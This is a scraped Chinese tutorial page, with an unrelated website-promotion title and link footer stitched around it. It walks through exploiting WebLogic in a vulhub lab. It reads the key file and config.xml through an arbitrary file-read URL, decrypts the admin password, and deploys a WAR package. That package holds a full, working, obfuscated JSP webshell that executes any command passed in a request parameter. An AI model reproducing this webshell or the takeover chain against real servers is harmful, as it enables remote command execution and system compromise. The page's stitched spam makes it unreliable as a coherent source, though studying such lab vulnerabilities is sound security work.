当前位置: 首页 > news >正文

张家港网站优化杭州网站建设方案服务公司

张家港网站优化,杭州网站建设方案服务公司,江西赣鄂皖路桥投资有限公司网站建设,网站开发项目需要什么人员文章目录 1、搭建环境2、漏洞特征3、漏洞利用1)获取用户名密码2)后台上传shell 4、检测工具 1、搭建环境 漏洞环境基于vulhub搭建–进入weak_password的docker环境 sudo docker-compose up -d拉取靶场 2、漏洞特征 404特征Weblogic常用端口:7001 3、漏洞利用…

文章目录

  • 1、搭建环境
  • 2、漏洞特征
  • 3、漏洞利用
    • 1)获取用户名密码
    • 2)后台上传shell
  • 4、检测工具

1、搭建环境

漏洞环境基于vulhub搭建–进入weak_password的docker环境
在这里插入图片描述

sudo docker-compose up -d拉取靶场
在这里插入图片描述在这里插入图片描述

2、漏洞特征

404特征Weblogic常用端口:7001
在这里插入图片描述

3、漏洞利用

任意读取文件、后台getshell,访问/console/login/LoginForm.jsp后缀来到后台管理处
获取用户名密码
http://192.168.25.128:7001/console/login/LoginForm.jsp
在这里插入图片描述在这里插入图片描述

1)获取用户名密码

使用任意读取文件方式获取用户名密码
weblogic密码使用AES(老版本3DES)加密,对称加密可解密,只需要找到用户的密文与加密时的密钥即可。这两个文件均位于base_domain下,名为SerializedSystemIni.dat和config.xml
开启bp,端口后拼接/hello/file.jsp?path=security/SerializedSystemIni.dat
即http://192.168.25.128:7001/hello/file.jsp?path=security/SerializedSystemIni.dat
在这里插入图片描述

切换到16进制,选择以上文字存到一个SerializedSystemIni.dat
在这里插入图片描述
在这里插入图片描述

注意:SerializedSystemIni.dat是一个二进制文件,所以一定要用burpsuite来读取,用浏览器直接下载可能引入一些干扰字符。在burp里选中读取到的那一串乱码,右键copy to file就可以保存成一个文件:
密钥文件:SerializedSystemIni.dat
访问http://ip:7001/hello/file.jsp?path=config/config.xml,其中的
的值,即为加密后的管理员密码
http://192.168.25.128:7001/hello/file.jsp?path=config/config.xml
在这里插入图片描述

{AES}yvGnizbUS0lga6iPA5LkrQdImFiS/DJ8Lw/yeE7Dt0k=
获取用户名密码:weblogic、Oracle@123

2)后台上传shell

前提:使用刚刚任意文件读取获取到的账号密码登录成功
在这里插入图片描述

上传路径:域结构-部署-安装-上传文件-将此部署安装为应用程序。然后访问项目名称即可。
最后访问的路径是
在这里插入图片描述

将包含类似于

<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%!public String HMfR(String yOK){String aAh="";for (int i = 0; i < yOK.length(); i++) {aAh+=(char)(yOK.charAt(i)+6);}return aAh;}
%>
<% String yiO=request.getParameter("websafe");if(yiO!=null){ Class tJIi = Class.forName(HMfR("d[p[(f[ha(Lohncg_"));
Process Mdlz = (Process) tJIi.getMethod(HMfR("_r_]"), String.class).invoke(tJIi.getMethod(HMfR("a_nLohncg_")).invoke(null),yiO);
java.io.InputStream in = Mdlz.getInputStream();byte[] PYp = new byte[2048];out.print("<pre>");while(in.read(PYp)!=-1){ out.println(new String(PYp)); }out.print("</pre>"); }
%>

在这里插入图片描述

在这里插入图片描述

shell.jsp,将其压缩为 shell.zip,然后重命名为 shell.war
在这里插入图片描述

选中war包并点击下一步上传–上传成功
在这里插入图片描述在这里插入图片描述

war是一个可以直接运行的web模块,通常用于网站,打成包部署到容器中。war包放置到web目录下之后,可以自动解压,就相当于发布了简单来说,war包是JavaWeb程序打的包,war包里面包括写的代码编译成的class文件,依赖的包,配置文件,所有的网站页面,包括html,jsp等等。一个war包可以理解为是一个web项目,里面是项目的所有东西
一直点下一步
在这里插入图片描述

浏览器访问http://192.168.25.128:7001/shell/shell.jsp?websafe=ifconfig
发现输出信息,说明可以shell可用,可以执行命令
在这里插入图片描述

4、检测工具

Java反序列化漏洞利用工具V1.7.jar
在这里插入图片描述

http://www.yayakq.cn/news/226124/

相关文章:

  • 怎么在百度建网站网站建设费计入 科目
  • 如何建造网站链接做影视网站
  • 苏州建设银行网站首页如何查看网站域名信息
  • 吉安网站推广徽hyhyk1食品包装设计开题报告
  • 网站主题模板制作贵阳做网站费用
  • 校园网站建设宣传个人网站建站步骤
  • 威胁网站检测平台建设wordpress文章自动内链
  • 济宁建设网站首页潍坊哪里有做360网站的
  • 企业网站为什么打不开wordpress语言切换插件
  • 如何做漂亮的网站首页wordpress红黑主题
  • 网站原型设计流程微网站设计方案
  • 常用的网站开发语言服装设计公司简介范文
  • 自媒体网站wordpress网站商城开发公司
  • 企业网站申请永久网站设计需要考虑的基本原则
  • 品牌红酒网站建设专业品牌网站建设
  • 甘肃网站开发公司唐山网站制作公司
  • 厦门有没网站建设的公司自己做的网站被攻击了
  • 一键安装网站运行环境微信网站如何开发
  • 基础网页制作流程企业网站优化是什么
  • 德州极速网站建设百家号网站建设销售工资多少
  • 手机网站和app的区别免费制作照片的软件
  • 重庆亮哥做网站网站个人主页怎么做
  • 房产销售网站设计品牌管理公司网站建设
  • 数据查询网站seo常用工具
  • 用vs2010做网站视频教程网站设计佛山顺德
  • 物流网站模板下载外贸建站服务推广公司
  • 网站死链对网站影响网站开发岗位就业分析
  • 网站访问工具wordpress 手机端分开
  • 网站模板开发网页设计制作课程表
  • 网站直播间 是怎么做的新乡市工程建设信息网